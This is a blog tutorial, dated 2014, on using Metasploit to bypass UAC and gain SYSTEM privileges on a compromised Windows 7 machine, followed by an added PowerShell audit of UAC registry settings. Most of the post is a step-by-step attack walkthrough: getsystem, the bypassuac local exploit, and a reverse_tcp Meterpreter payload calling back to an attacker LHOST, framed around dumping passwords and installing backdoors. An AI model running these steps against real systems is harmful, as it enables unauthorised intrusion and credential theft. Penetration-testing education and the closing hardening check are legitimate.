Thursday, 20 November 2014

Bypass UAC and get admin privilege in windows 7 using metasploit




Sometimes when you exploit a security hole and succeed in gaining access to the target system, you usually act only as the logged-in user, not as the local SYSTEM account. In this tip there is a simple set of steps to escalate your privileges once you are inside meterpreter.
The picture below was taken after successfully gaining access using a payload I created.
[Screenshot: rsz_screenshot_from_2014-06-19_082326]
meterpreter > getuid
When running the getuid command, we can see that we are running as the user who is already logged in to the system, not as the SYSTEM account. How do we escalate our privileges to the SYSTEM account?
The session only has limited user rights. This can severely limit actions you can perform on the remote system such as dumping passwords, manipulating the registry, installing backdoors, etc. 
Fortunately, Metasploit has a Meterpreter script, ‘getsystem’, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. There are also various other (local) exploits that can be used to escalate privileges.
meterpreter > use priv
meterpreter > getsystem
To make use of the ‘getsystem’ command, we first need to load the ‘priv’ extension if it is not already loaded.
We will let Metasploit try to do the heavy lifting for us by running “getsystem” without any options. The script will attempt every method available to it, stopping when it succeeds.
There are situations where getsystem fails, depending upon the operating system and the exploitation method we are using.
[Screenshot from 2014-06-17 19:30:14]
In the image above we only have access as a normal user account with limited privileges; executing the post/windows/gather/win_privs module lists the privileges of the currently logged-in user.
For this tutorial we are exploiting Windows 7 as the victim’s machine. Executing the sysinfo command in your meterpreter shell gives you information about the system you are exploiting.
meterpreter > sysinfo
meterpreter > run post/windows/gather/win_privs
If the getsystem code detects that it is running on Windows 7 with UAC disabled and it is running as a local admin, it will run getsystem using the read registry method.
When we execute the getsystem command here it fails, because the currently logged-in user does not have enough privilege to obtain admin rights, and on Windows 7 in particular UAC is enabled by default.
So we first try to bypass UAC on Windows 7. Luckily, we have a Windows UAC bypass exploit in Metasploit.
Meterpreter on Kali no longer recognizes “run bypassuac”; instead we have to use exploit/windows/local/bypassuac.
The BypassUAC exploit allows you to bypass Windows UAC on Windows Vista and Windows 7, on both x86 and x64 operating systems. This issue has still not been patched to date and can still be exploited on the most recent operating systems.
For that we need to background the session, manually run the bypassuac exploit against the session we just backgrounded, and then execute getsystem to get admin privileges.
meterpreter > background
meterpreter > search uac
meterpreter > use exploit/windows/local/bypassuac
I exploited this machine with the payload I created before, so try the method you used for exploiting the machine before.
meterpreter > set payload windows/meterpreter/reverse_tcp
meterpreter > set LHOST 192.168.31.20
meterpreter > set LPORT 8080
meterpreter > set SESSION 1
meterpreter > exploit
[Screenshot from 2014-06-17 19:34:24]
[Screenshot from 2014-06-17 19:35:07]
After getting access, try the getsystem command.
meterpreter > getsystem
[Screenshot from 2014-06-17 19:36:15]
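The bypass above depends on the default UAC configuration (prompt only for non-Windows binaries, with signed Windows binaries auto-elevating) and on the compromised user being a local administrator; the bypassuac module aborts when UAC is set to "Always notify". The PowerShell audit below is an added example, not part of the original post, and reads the real policy values under HKLM so an administrator can check whether a host is still in that default state.

```powershell
# Added example: audit the UAC policy values that the bypassuac technique
# relies on. Reads the live registry; run on the Windows host being checked.
$key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$p = Get-ItemProperty -Path $key

$findings = @()

# EnableLUA = 1 means UAC is on at all; anything else means no token filtering.
if ($p.EnableLUA -ne 1) {
    $findings += 'EnableLUA is not 1: UAC is disabled, admin logons already get a full token.'
}

# ConsentPromptBehaviorAdmin: 0 = elevate silently, 2 = Always notify (secure desktop),
# 5 = Windows default (auto-elevate trusted Windows binaries, prompt for others).
switch ($p.ConsentPromptBehaviorAdmin) {
    0 { $findings += 'ConsentPromptBehaviorAdmin=0: administrators elevate without any prompt.' }
    2 { }   # Always notify: auto-elevation is off, which is the setting that stops this bypass
    default {
        $findings += "ConsentPromptBehaviorAdmin=$($p.ConsentPromptBehaviorAdmin): " +
                     'trusted Windows binaries auto-elevate; set to 2 (Always notify).'
    }
}

# PromptOnSecureDesktop = 1 keeps the consent dialog isolated from user-mode input.
if ($p.PromptOnSecureDesktop -ne 1) {
    $findings += 'PromptOnSecureDesktop is not 1: elevation prompts are not on the secure desktop.'
}

# FilterAdministratorToken = 1 applies UAC to the built-in Administrator account too.
if ($p.FilterAdministratorToken -ne 1) {
    $findings += 'FilterAdministratorToken is not 1: built-in Administrator is exempt from UAC.'
}

if ($findings.Count -eq 0) {
    'UAC is at its strictest configuration.'
} else {
    $findings | ForEach-Object { "[!] $_" }
}
```

Reducing day-to-day accounts to standard users removes the other precondition, since the bypass only helps a user who is already in the local Administrators group.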
